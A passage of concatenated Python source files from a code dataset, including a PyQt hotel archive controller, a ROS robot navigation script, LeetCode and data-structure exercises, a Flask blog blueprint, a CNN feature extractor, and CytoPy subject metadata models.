>~~~~~~~~~~~\n def archive_search(self):\n self._model.refresh_archive()\n arch = []\n t = 0\n combo = self._view.comboBox_archive.currentText()\n\n if combo == 'Room no.':\n fltr = self._view.lineEdit_archive.text()\n\n for a in self._model.archived:\n if fltr == '' or a._room_no == fltr:\n arch.append(a)\n\n elif combo == 'Date':\n fltr = self._view.dateEdit_archive.date().toPyDate().strftime(\"%Y/%m/%d\")\n\n for a in self._model.archived:\n if fltr == a._start or fltr == a._end:\n arch.append(a)\n\n elif combo == 'Guests':\n fltr = self._view.lineEdit_archive.text()\n\n for a in self._model.archived:\n if fltr == '' or fltr in a._guests:\n arch.append(a)\n\n elif combo == 'Balance':\n fltr = self._view.checkBox_archive_debtor.isChecked(), self._view.checkBox_archive_creditor.isChecked()\n\n for a in self._model.archived:\n if (fltr[0] and float(a._level)>0) or (fltr[1] and float(a._level)<0) or not (fltr[0] or fltr[1]):\n arch.append(a)\n\n\n self._view.tableWidget_archive.setRowCount(0)\n for a in arch:\n t += float(a._room_total_payment) + float(a._service_total_payment)\n self._view.add_to_table(self._view.tableWidget_archive, \n a._type_,\n a._room_no,\n a._start,\n a._end,\n a._guests,\n a._room_total_payment,\n a._service_total_payment,\n a._level,\n a._comment,\n color=self.colorize(float(a._level)))\n\n self._view.lineEdit_archive_total.setText(str(t))\n\n # ~~~~~~~~~~~< archive_edit >~~~~~~~~~~~\n def archive_edit(self):\n t = self._view.tableWidget_archive\n b = t.item(t.currentRow(),7)\n if not b == None:\n if not float(b.text()) == 0:\n blnc = Balance_DLG(t, t.currentRow(), self._model.archived, self._model.db.archive)\n blnc.exec_()\n self._model.refresh_archive()\n self.archive_search()\n\n # ~~~~~~~~~~~< run >~~~~~~~~~~~\n def run(self):\n self._view.ui.show()\n return self._app.exec_()\n\n\n#if __name__ == '__main__':\napp = QtWidgets.QApplication(sys.argv)\nlogin = Login()\n\nif login.exec_() == QtWidgets.QDialog.Accepted:\n c = Controller()\n sys.exit(c.run())","sub_path":"modules/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":16673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"64769930","text":"import unittest\n\nimport explore_australia\n\nclass TestVersion(unittest.TestCase):\n\n def test_version(self):\n \"Check version is correct\"\n self.assertEqual(explore_australia.__version__, '0.0.1')\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_version.py","file_name":"test_version.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"133996576","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport roslib\nimport rospy\nimport actionlib\nimport pygame\nimport time\nfrom sensor_msgs.msg import Image\nimport subprocess\nfrom std_msgs.msg import String\nimport cv_bridge\nimport cv2\nfrom threading import Lock\n#move_base_msgs\nfrom move_base_msgs.msg import *\n\nnumber = [\n [-9.9475019784, 1.1746130689, 0.3454174, 0.938449153995], # 413\n [-8.5395602, 0.0006826564, 0.259789427, 0.9656674894], # left 412\n [-2.07413604, -7.242282841, 0.340837238, 0.940137933] #right 412 \n ]\nnot_detected = True\noccupied = False\ncnt = 1\n\n#number = [\n# [2.68418028507, 6.32836545207, 0.995296423679, 0.0968763594063], # 251\n# [2.97993330195, 7.78973598536, 0.989846215693, 0.142142426034], # 252\n# [5.90723436272, 11.3865553893, -0.259246136482, 0.965811286287], # 255\n# [4.65333389466, 8.9399562701, -0.268687279702, 0.963227463129], # 254\n# [3.67297275746, 5.9756919696, -0.274823414105, 0.961494717125] # 255\n# ]\n\n#between = [\n# [5.93028237029, 11.497519954, -0.827577087007, 0.561277344421], #after 255\n# [4.6901158, 8.90323, -0.762108, 0.64744938], #after 254\n# [3.6016501, 6.0969845, -0.8243698, 0.566051] #after 253\n#]\n\ndef detect_callback(data):\n global not_detected, occupied, cnt, lock\n \n lock.acquire()\n if cnt == 1:\n cnt = 0\n lock.release()\n #pygame.mixer.music.stop()\n #occupied = True\n return 0\n\ndef image_callback(data):\n bridge = cv_bridge.CvBridge()\n \n try:\n image = bridge.imgmsg_to_cv2(data, \"bgr8\")\n except cv_bridge.CvBridgeError as e:\n print(e)\n\n\n # Display the resulting image\n \n cv2.imshow(\"Image window\", image)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n \n return\n \n\ndef simple_move():\n global not_detected, cnt, lock\n \n #Simple Action Client\n sac = actionlib.SimpleActionClient('move_base', MoveBaseAction )\n\n #create goal\n goal = MoveBaseGoal()\n #rate = rospy.Rate(10)\n i = 0\n while not rospy.is_shutdown():\n \n #set goal\n not_detected = True\n goal.target_pose.pose.position.x = number[i][0]\n goal.target_pose.pose.position.y = number[i][1]\n goal.target_pose.pose.orientation.z = number[i][2]\n goal.target_pose.pose.orientation.w = number[i][3]\n goal.target_pose.header.frame_id = 'map'\n goal.target_pose.header.stamp = rospy.Time.now()\n\n #start listner\n sac.wait_for_server()\n\n #send goal\n sac.send_goal(goal)\n\n #finish\n result = sac.wait_for_result()\n \n #print result\n print(result)#sac.get_result())\n \n \n \n print(\"Round\", i)\n if result:\n lock.acquire()\n cnt = 1\n lock.release()\n start_time = time.time()\n pygame.mixer.music.load('/home/shinyao/catkin_ws/knock.mp3')\n pygame.mixer.music.play(-1)\n\n '''\n if i != 1:\n while time.time() - start_time < 20.0: \n pass\n else:\n time.sleep(20)\n\n if cnt == 0:\n pygame.mixer.music.load('/home/shinyao/catkin_ws/newyear.mp3')\n pygame.mixer.music.play(-1)\n print('i see you')\n \n time.sleep(10)\n \n print(\"Ready to leave the door\")\n '''\n\n while time.time() - start_time < 20.0:\n if cnt == 0:\n pygame.mixer.music.stop()\n pygame.mixer.music.load('/home/shinyao/catkin_ws/newyear.mp3')\n pygame.mixer.music.play(2)\n print('i see you')\n\n time.sleep(10)\n break\n\n\n\n\n\n pygame.mixer.music.stop()\n #time.sleep(11)\n #cv2.destroyAllWindows()\n #not_detected = True\n else:\n print(\"failed to reach goal\")\n \n print(\"Round\",i,\" bye\")\n i += 1\n if i >= len(number):\n return\n #rate.sleep()\n\n'''\ngoal.target_pose.pose.position.x = 3.42265447927\ngoal.target_pose.pose.position.y = 1.09429176934\ngoal.target_pose.pose.orientation.z = -0.491279655277\ngoal.target_pose.pose.orientation.w = 0.871001894551\n'''\n\n\nif __name__ == '__main__':\n try:\n lock = Lock()\n pygame.init()\n \n #pygame.mixer.music.play(0)\n \n rospy.init_node('simple_move')\n rospy.Subscriber(\"face_detect\", String, detect_callback)\n #rospy.spin()\n simple_move()\n except rospy.ROSInterruptException:\n print(\"Keyboard Interrupt\")\n","sub_path":"lzrobot/scripts/send_simple_goal.py","file_name":"send_simple_goal.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"472787028","text":"class Solution:\n def numUniqueEmails(self, emails):\n \"\"\"\n :type emails: List[str]\n :rtype: int\n \"\"\"\n \n checked = set()\n \n for email in emails:\n first, domain = email.split(\"@\")\n firstPrefix, firstSuffix = first.split(\"+\", 1)\n firstPrefix = firstPrefix.replace(\".\",\"\")\n \n cleanedEmail = f\"{firstPrefix}@{domain}\"\n checked.add(cleanedEmail)\n \n return len(checked)\n\n# 8 minutes","sub_path":"leetcode/unique-email-addresses.py","file_name":"unique-email-addresses.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"136888828","text":"from django.conf.urls import patterns, url\nfrom clientes import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^web$', views.web, name='web'), # WEB\n url(r'^acesso$', views.webAcesso, name='webAcesso'), # WEB\n url(r'^novo$', views.clienteNovo, name='clienteNovo'),\n url(r'^consulta$', views.clienteConsulta, name='clienteConsulta'),\n url(r'^adicionar$', views.clienteAdicionar, name='clienteAdicionar'),\n url(r'^lista$', views.clienteLista, name='clienteLista'),\n url(r'^(?P\\d+)$', views.clienteDados, name='clienteDados'),\n url(r'^(?P\\d+)/enderecos/novo$', views.enderecoNovo, name='enderecoNovo'),\n url(r'^(?P\\d+)/enderecos/adicionar$', views.enderecoAdicionar, name='enderecoAdicionar'),\n url(r'^(?P\\d+)/enderecos/deletar/(?P\\d+)$', views.enderecoDeletar, name='enderecoDeletar'),\n)\n","sub_path":"Web/clientes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"45912630","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport threading\nimport cv2\nimport numpy as np\nimport yaml\nimport pickle\nimport pdb\nimport tqdm\n\nimport torch\nimport torch.nn as nn\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nfrom PIL import Image\n\n#https://github.com/lukemelas/EfficientNet-PyTorch\nfrom efficientnet_pytorch import EfficientNet\nmodel = EfficientNet.from_pretrained('efficientnet-b0')\nmodel._fc = nn.Identity()\nmodel.eval()\n\ntfms = transforms.Compose([transforms.Resize(224), transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),])\n\ndef get_features(model, tfms, image_pil):\n #img = tfms(Image.open(image)).unsqueeze(0)\n img = tfms(image_pil).unsqueeze(0)\n model.eval()\n with torch.no_grad():\n features = model(img)\n return features.numpy()\n\ndef get_cnn_features_from_video(downsampled_video_filename, video_name, keyframe_interval):\n \"Receives filename of downsampled video and of output path for features. Extracts features in the given keyframe_interval. Saves features in pickled file.\"\n\n images = get_keyframes(downsampled_video_filename,keyframe_interval)\n data = []\n counter = 0\n for image in images:\n image_cv = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n image_pil = Image.fromarray(image_cv)\n# cv2.imwrite('frame.jpg', image)\n features = get_features(model, tfms, image_pil)\n data.append(features)\n #print(downsampled_video_filename)\n try:\n data = np.array(data)\n except:\n #continue\n pass\n \n #if data is not []:\n pickle.dump(data, open(str('test/'+video_name+'.pkl'), 'wb'))\n\n \ndef get_keyframes(downsampled_video_filename, keyframe_interval):\n \"Generator function which returns the next keyframe.\"\n\n # Create video capture object\n video_cap = cv2.VideoCapture(downsampled_video_filename)\n frame = 0\n while True:\n frame += 1\n ret, img = video_cap.read()\n if ret is False:\n break\n if frame % keyframe_interval == 0:\n yield img\n video_cap.release()\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print(\"Usage: {0} video_list config_file\".format(sys.argv[0]))\n print(\"video_list -- file containing video names\")\n print(\"config_file -- yaml filepath containing all parameters\")\n exit(1)\n\n all_video_names = sys.argv[1]\n config_file = sys.argv[2]\n my_params = yaml.load(open(config_file))\n\n # Get parameters from config file\n keyframe_interval = my_params.get('keyframe_interval')\n #hessian_threshold = my_params.get('hessian_threshold')\n cnn_features_folderpath = my_params.get('test_features')\n downsampled_videos = my_params.get('downsampled_videos')\n\n # Check if folder for CNN features exists\n if not os.path.exists(cnn_features_folderpath):\n os.mkdir(cnn_features_folderpath)\n\n # Loop over all videos (training, val, testing)\n\n fread = open(all_video_names, \"r\")\n for line in tqdm.tqdm(fread.readlines()):\n video_name = line.replace('\\n', '')\n downsampled_video_filename = os.path.join(downsampled_videos, video_name + '.ds.mp4')\n\n if not os.path.isfile(downsampled_video_filename):\n continue\n\n if os.path.isfile(str('test/'+video_name+'.pkl')):\n #print('{} exists'.format(str('cnn/'+video_name+'.pkl')))\n continue\n\n # Get CNN features for one video\n get_cnn_features_from_video(downsampled_video_filename,\n video_name, keyframe_interval)\n","sub_path":"hw2_code/cnn_feat_extraction-test.py","file_name":"cnn_feat_extraction-test.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"89966005","text":"from datahub.core.thread_pool import submit_to_thread_pool\nfrom datahub.search.bulk_sync import sync_objects\nfrom datahub.search.migrate_utils import delete_from_secondary_indices_callback\n\n\ndef _sync_object(es_model, db_model, pk):\n read_indices, write_index = es_model.get_read_and_write_indices()\n\n instance = db_model.objects.get(pk=pk)\n sync_objects(\n es_model,\n [instance],\n read_indices,\n write_index,\n post_batch_callback=delete_from_secondary_indices_callback,\n )\n\n\ndef sync_object_async(search_model, db_model, pk):\n \"\"\"\n Syncs a single object to Elasticsearch asynchronously (using the thread pool).\n\n This function is normally used by signal receivers to copy new or updated objects to\n Elasticsearch.\n\n This function is migration-safe – if a migration is in progress, the object is added to the\n new index and then deleted from the old index.\n \"\"\"\n return submit_to_thread_pool(_sync_object, search_model, db_model, pk)\n","sub_path":"datahub/search/sync_async.py","file_name":"sync_async.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"381803116","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n\ndef fibonacci():\n n, n1, n2 = 0, 0, 1\n for x in range(0, 30):\n print(n, end = \" - \")\n n = n2\n n1, n2 = n2, n1 + n\n\nfibonacci()\n","sub_path":"fibonacci/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"191307140","text":"#https://leetcode.com/problems/implement-trie-prefix-tree/ Medium\n\nclass TrieNode:\n # Trie node class\n def __init__(self):\n self.children = [None] * 26\n # is End\n self.isEnd = False\n\n\nclass Trie:\n # Trie data structure class\n def __init__(self):\n self.root = self.getNode()\n\n def getNode(self):\n # Returns new trie node (initialized to NULL)\n return TrieNode()\n\n def _charToIndex(self, ch):\n # return 0 -> 'a', 1->'b',2->'c'\n return ord(ch) - ord('a')\n\n def insert(self, key):\n pCrawl = self.root\n length = len(key)\n for level in range(length):\n index = self._charToIndex(key[level])\n\n # if current character is not present\n if not pCrawl.children[index]:\n pCrawl.children[index] = self.getNode()\n pCrawl = pCrawl.children[index]\n # mark as last node as leaf\n pCrawl.isEnd = True\n\n # Time complexity for insert and search - O(string_length)\n def search(self, key):\n pCrawl = self.root\n length = len(key)\n for level in range(length):\n index = self._charToIndex(key[level])\n if not pCrawl.children[index]:\n return False\n pCrawl = pCrawl.children[index]\n return pCrawl != None and pCrawl.isEnd\n\n def startsWith(self, key):\n pCrawl = self.root\n length = len(key)\n for level in range(length):\n index = self._charToIndex(key[level])\n if not pCrawl.children[index]:\n return False\n pCrawl = pCrawl.children[index]\n return pCrawl != None\n","sub_path":"Tandon-LeetCode-Bootcamp/Week 2 Strings/implement-trie-prefix-tree.py","file_name":"implement-trie-prefix-tree.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"127832632","text":"# Function to print the matrix\ndef print_matrix(mat):\n for i in range(len(mat)):\n for j in range(len(mat)):\n print(str(mat[i][j]), end=\" \")\n print()\n\n# Function to transpose the matrix\ndef transpose_matrix(mat):\n for i in range(len(mat)):\n for j in range(i, len(mat)):\n mat[i][j], mat[j][i] = mat[j][i], mat[i][j]\n\n# Function to rotate the matrix clock wise\ndef clock_wise_rotate(mat):\n for i in range(len(mat)):\n k = len(mat) - 1\n aa = 1\n for j in range(k):\n if k >= 1:\n mat[i][j], mat[i][k] = mat[i][k], mat[i][j]\n k = k - aa\n aa += 1\n\n\n# Main Function\nmat = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\nprint(\"The array before rotation is \")\nprint_matrix(mat)\n\ntranspose_matrix(mat)\nclock_wise_rotate(mat)\n\nprint(\"\\nThe array after rotation is \")\nprint_matrix(mat)\n\n# mat 2\nmat2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]]\nprint(\"The array before rotation is \")\nprint_matrix(mat2)\n\ntranspose_matrix(mat2)\nclock_wise_rotate(mat2)\n\nprint(\"\\nThe array after rotation is \")\nprint_matrix(mat2)\n","sub_path":"Rotate_Matrix_90_Degree_Clock.py","file_name":"Rotate_Matrix_90_Degree_Clock.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"289888685","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\nfrom sqlalchemy import desc\n\n\n#from app.auth import login_required\n#from app.database import get_db\nfrom auth import login_required\n#from database import get_db\nfrom models import db, User, Post\n\n\nbp = Blueprint('post', __name__)\n\n@bp.route('/')\ndef index():\n \"\"\"\n db = get_db()\n posts = db.execute(\n 'SELECT p.id, title, body, created, author_id, username'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' ORDER BY created DESC'\n ).fetchall()\n \"\"\"\n #print(\"check_author-: \", check_author)\n posts = Post.query.filter(Post.author_id == User.id).order_by(desc(Post.created))\n #print(\"posts-: \", posts)\n\n return render_template('post/index.html', posts=posts)\n\n@bp.route('/create', methods=('GET', 'POST'))\n@login_required\ndef create():\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n \"\"\"\n db = get_db()\n db.execute(\n 'INSERT INTO post (title, body, author_id)'\n ' VALUES (?, ?, ?)',\n (title, body, g.user['id'])\n )\n db.commit()\n \"\"\"\n #print(\"g.user.id: \",g.user.id)\n #print(\"title: \", title)\n #print(\"body: \", body)\n _post = Post( g.user.id, title, body)\n db.session.add(_post)\n db.session.commit()\n\n return redirect(url_for('post.index'))\n\n return render_template('post/create.html')\n\ndef get_post(id, check_author=True):\n \"\"\"\n post = get_db().execute(\n 'SELECT p.id, title, body, created, author_id, username'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' WHERE p.id = ?',\n (id,)\n ).fetchone()\n \"\"\"\n #print(\"id: \", id)\n post = Post.query.filter(Post.id == id).first()\n #print(\"post: \", post)\n #print(\"post.id: \", post.id)\n\n if post is None:\n abort(404, \"Post id {0} doesn't exist.\".format(id))\n\n print(\"check_author: \", check_author)\n print(\"post.id: \", post.id)\n print(\"g.user.id: \", g.user.id)\n\n \"\"\"\n if check_author and post.id != g.user.id:\n abort(403)\n \"\"\"\n \n return post\n\n@bp.route('//update', methods=('GET', 'POST'))\n@login_required\ndef update(id):\n post = get_post(id)\n\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n \"\"\"\n db = get_db()\n db.execute(\n 'UPDATE post SET title = ?, body = ?'\n ' WHERE id = ?',\n (title, body, id)\n )\n db.commit()\n \"\"\"\n _post = Post.query.filter(Post.id == id).first()\n db.session.delete(_post)\n\n post = Post(g.user.id, title, body)\n db.session.add(post)\n db.session.commit()\n\n return redirect(url_for('post.index'))\n\n return render_template('post/update.html', post=post)\n\n@bp.route('//delete', methods=('POST',))\n@login_required\ndef delete(id):\n get_post(id)\n\n \"\"\"\n db = get_db()\n db.execute('DELETE FROM post WHERE id = ?', (id,))\n db.commit()\n \"\"\"\n post = Post.query.filter(Post.id == id).first()\n db.session.delete(post)\n db.session.commit()\n return redirect(url_for('post.index'))","sub_path":"insightmark/insightmark/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"143187786","text":"import functools\n\n#Q1\nprint(\"Q1\")\n\n# First input: the number of strings\nnumOfStr = input()\nnumOfStr = int(numOfStr)\n\nif numOfStr == 0:\n print (\"No string available\")\n\nelse:\n\n # Second input\n string1 = input().split(\",\")\n\n f = map(lambda str: list(str), string1)\n print(list(f))\n\n#Q2\nprint(\"Q2\")\n\ndef frequency(str):\n\n frequencydict = {} # frequency listing in python dictionary\n\n str = str.lower()\n\n for letter in list(str):\n\n if letter == \" \": continue\n\n if letter in frequencydict:\n frequencydict[letter] += 1\n else:\n frequencydict[letter] = 1\n\n return frequencydict\n\ntexts = []\n\n# Get Keyboard input and append it to texts\nwhile True:\n text = input()\n\n if text == \"\\end\":\n break\n\n texts.append(text)\n\nif len(texts) == 0: print (\"Error\")\nelse:\n\n for i in range(len(texts)):\n\n unordered_dict = frequency(texts[i])\n ordered_dict = {}\n\n # sort the dictionary by keys\n for key, value in sorted(unordered_dict.items()):\n\n ordered_dict[key] = value\n\n print(ordered_dict)\n\n#Q3\nprint(\"Q3\")\n\nlocs = []\n\nwhile True:\n\n x_y = input()\n if x_y == \"\\end\":\n break\n\n x_y = x_y.split(\",\")\n locs.append((float(x_y[0]),float(x_y[1])))\n\npoints = iter(locs)\n\ndef comp1(p1, p2):\n\n # First compare x point\n if p1[0] < p2[0]:\n return p1\n\n elif p1[0] > p2[0]:\n return p2\n\n else:\n # Compare y point\n if p1[1] < p2[1]:\n return p1\n elif p1[1] > p2[1]:\n return p2\n else:\n p2 # p1 and p2 is the same\n\nout = functools.reduce(comp1, points)\n\nprint (out)","sub_path":"Homework/hw07.py","file_name":"hw07.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"153967124","text":"#!/usr/bin.env/python\n# -*- coding: utf-8 -*-\n\"\"\"\nEach subject in your analysis (human, mouse, cell line etc) can be\nrepresented by a Subject document that can then be associated to\nspecimens in an Experiment. This Subject document is dynamic and can\nhouse any relating meta-data.\n\nProjects also house the subjects (represented by the Subject class;\nsee CytoPy.data.subject) of an analysis which can contain multiple\nmeta-data.\n\nCopyright 2020 Ross Burton\n\nPermission is hereby granted, free of charge, to any person\nobtaining a copy of this software and associated documentation\nfiles (the \"Software\"), to deal in the Software without restriction,\nincluding without limitation the rights to use, copy, modify,\nmerge, publish, distribute, sublicense, and/or sell copies of the\nSoftware, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nfrom .fcs import FileGroup\nimport mongoengine\nimport numpy as np\n\n__author__ = \"Ross Burton\"\n__copyright__ = \"Copyright 2020, CytoPy\"\n__credits__ = [\"Ross Burton\", \"Simone Cuff\", \"Andreas Artemiou\", \"Matthias Eberl\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Ross Burton\"\n__email__ = \"burtonrj@cardiff.ac.uk\"\n__status__ = \"Production\"\n\n\nclass MetaDataDictionary(mongoengine.Document):\n \"\"\"\n Model for a custom dictionary that can be used for given descriptions to meta-data.\n Helpful when exploring single cell data that has been associated to meta-data in the Explorer object;\n see flow.clustering.main.Explorer)\n\n Attributes\n -----------\n key: str\n name of meta-data (column name)\n desc: str\n string value of writen description\n \"\"\"\n key = mongoengine.StringField()\n desc = mongoengine.StringField()\n\n\nclass Drug(mongoengine.EmbeddedDocument):\n \"\"\"\n Document representation of drug administration. Single document instance represents one event.\n\n Attributes\n -----------\n name: str\n name of therapy/drug\n init_date: DateTime\n date that therapy/drug started\n end_data: DateTime\n date that therapy/drug ended\n \"\"\"\n name = mongoengine.StringField(required=True)\n init_date = mongoengine.DateTimeField(required=False)\n end_date = mongoengine.DateTimeField(required=False)\n dose = mongoengine.StringField(required=False)\n notes = mongoengine.StringField(required=False)\n\n\nclass Bug(mongoengine.EmbeddedDocument):\n \"\"\"\n Document representation of isolated pathogen. Single document instance represents one pathogen.\n\n Attributes\n -----------\n gram_status: str, optional\n value of organisms gram status, valid choices are ['P+ve', 'N-ve', 'Unknown']\n hmbpp_status: str, optional\n value of hmbpp status, valid choices are ['P+ve', 'N-ve', 'Unknown']\n ribo_status: str, optional\n value of organisms ribo status, valid choices are ['P+ve', 'N-ve', 'Unknown']\n org_name: str\n name of the organism\n id_method: str, optional\n method used to identify organism\n culture_source: str, optional\n site of isolated organism\n organism_type: str, optional\n type of organism isolated, valid choices are ['bacteria', 'fungi', 'virus']\n report_date: DateTime, optional\n date that organism was reported\n notes: str, optional\n string value for free text notes\n \"\"\"\n gram_status = mongoengine.StringField(required=False, choices=['P+ve', 'N-ve', 'Unknown'])\n hmbpp_status = mongoengine.StringField(required=False, choices=['P+ve', 'N-ve', 'Unknown'])\n ribo_status = mongoengine.StringField(required=False, choices=['P+ve', 'N-ve', 'Unknown'])\n org_name = mongoengine.StringField(required=False)\n short_name = mongoengine.StringField(required=False)\n id_method = mongoengine.StringField(required=False)\n culture_source = mongoengine.StringField(required=False)\n organism_type = mongoengine.StringField(required=False, choices=['bacteria', 'fungi', 'virus'])\n report_date = mongoengine.DateTimeField(required=False)\n growth_weight = mongoengine.StringField(required=False)\n notes = mongoengine.StringField(required=False)\n\n\nclass Biology(mongoengine.EmbeddedDocument):\n \"\"\"\n Document representation of biological test (blood pathology). Single document instance represents one test.\n\n Attributes\n -----------\n test_date: DateTime\n date that test was performed\n test: str\n name of pathology test\n result: float\n value of pathology test\n unit: str\n units reported\n ref_range: str\n reported reference range\n test_category: str\n category of test\n \"\"\"\n test_date = mongoengine.DateTimeField(required=False)\n test = mongoengine.StringField(required=False)\n result = mongoengine.FloatField(required=False)\n unit = mongoengine.StringField(required=False)\n ref_range = mongoengine.StringField(required=False)\n test_category = mongoengine.StringField(required=False)\n notes = mongoengine.StringField(required=False)\n\n\nclass Subject(mongoengine.DynamicDocument):\n \"\"\"\n Document based representation of subject meta-data.\n Subjects are stored in a dynamic document, meaning\n new properties can be added ad-hoc.\n\n Attributes\n -----------\n subject_id: str, required\n Unique identifier for subject\n files: ListField\n List of references to files associated to subject\n drug_data: EmbeddedDocListField\n Associated drug data\n infection_data: EmbeddedDocListField\n Associated infection data\n patient_biology: EmbeddedDocListField\n Associated biological data\n notes: str\n Additional notes\n \"\"\"\n subject_id = mongoengine.StringField(required=True, unique=True)\n\n # Associated FCS Files\n files = mongoengine.ListField(mongoengine.ReferenceField(FileGroup, reverse_delete_rule=mongoengine.PULL))\n\n # Embeddings\n drug_data = mongoengine.EmbeddedDocumentListField(Drug)\n infection_data = mongoengine.EmbeddedDocumentListField(Bug)\n patient_biology = mongoengine.EmbeddedDocumentListField(Biology)\n\n # Notes\n notes = mongoengine.StringField(required=False)\n\n meta = {\n 'db_alias': 'core',\n 'collection': 'subjects'\n }\n\n def delete(self, *args, **kwargs):\n \"\"\"\n Delete the Subject. The subject will automatically be pulled from associated Projects (reference field in\n Project model has reverse_delete_rile=4; see mongoengine API for info).\n\n WARNING: deletion of a subject will result in the automatic removal of all associated FCS data!\n\n Parameters\n ----------\n signal_kwargs: optional\n kwargs dictionary to be passed to the signal calls.\n write_concern\n Extra keyword arguments are passed down which will be used as options for the resultant getLastError command.\n For example, save(..., w: 2, fsync: True) will wait until at least two servers have recorded the write and\n will force an fsync on the primary server.\n\n Returns\n -------\n None\n \"\"\"\n for f in self.files:\n f.delete()\n super().delete(*args, **kwargs)\n\n\ndef gram_status(subject: Subject) -> str:\n \"\"\"\n Given an instance of Subject, return the gram status of isolated organisms.\n Where multiple organisms are found, if gram status differs amongst orgs, returns 'mixed'\n\n Parameters\n ----------\n subject: Subject\n\n Returns\n --------\n str\n String value for gram status\n \"\"\"\n if not subject.infection_data:\n return 'Unknown'\n orgs = [b.gram_status for b in subject.infection_data]\n if not orgs:\n return 'Unknown'\n if len(orgs) == 1:\n return orgs[0]\n return 'Mixed'\n\n\ndef bugs(subject: Subject, multi_org: str, short_name: bool = False) -> str:\n \"\"\"\n Fetch the name of isolated organisms for each patient.\n\n Parameters\n -----------\n subject: Subject\n short_name: bool\n If True, the shortened name rather than whole latin name is returned\n multi_org: str\n If 'multi_org' equals 'list' then multiple organisms will be stored as a comma separated list\n without duplicates, whereas if the value is 'mixed' then multiple organisms will result in a value of 'mixed'.\n\n Returns\n --------\n str\n string of isolated organisms comma separated, or 'mixed' if multi_org == 'mixed' and multiple organisms\n listed for patient\n \"\"\"\n if not subject.infection_data:\n return 'Unknown'\n if short_name:\n orgs = [b.short_name for b in subject.infection_data]\n else:\n orgs = [b.org_name for b in subject.infection_data]\n if not orgs:\n return 'Unknown'\n if len(orgs) == 1:\n return orgs[0]\n if multi_org == 'list':\n return ','.join(orgs)\n return 'mixed'\n\n\ndef org_type(subject: Subject) -> str:\n \"\"\"\n Parse all infectious isolates for each patient and return the organism type isolated, one of either:\n 'gram positive', 'gram negative', 'virus', 'mixed' or 'fungal'\n\n Parameters\n -----------\n subject: Subject\n\n Returns\n --------\n str\n common organism type isolated for patient\n \"\"\"\n\n def bug_type(b: Bug):\n if not b.organism_type:\n return 'Unknown'\n if b.organism_type == 'bacteria':\n return b.gram_status\n return b.organism_type\n\n bugs = list(set(map(bug_type, subject.infection_data)))\n if len(bugs) == 0:\n return 'Unknown'\n if len(bugs) == 1:\n return bugs[0]\n return 'mixed'\n\n\ndef hmbpp_ribo(subject: Subject, field: str) -> str:\n \"\"\"\n Given a value of either 'hmbpp' or 'ribo' for 'field' argument, return True if any Bug has a positive status\n for the given patient 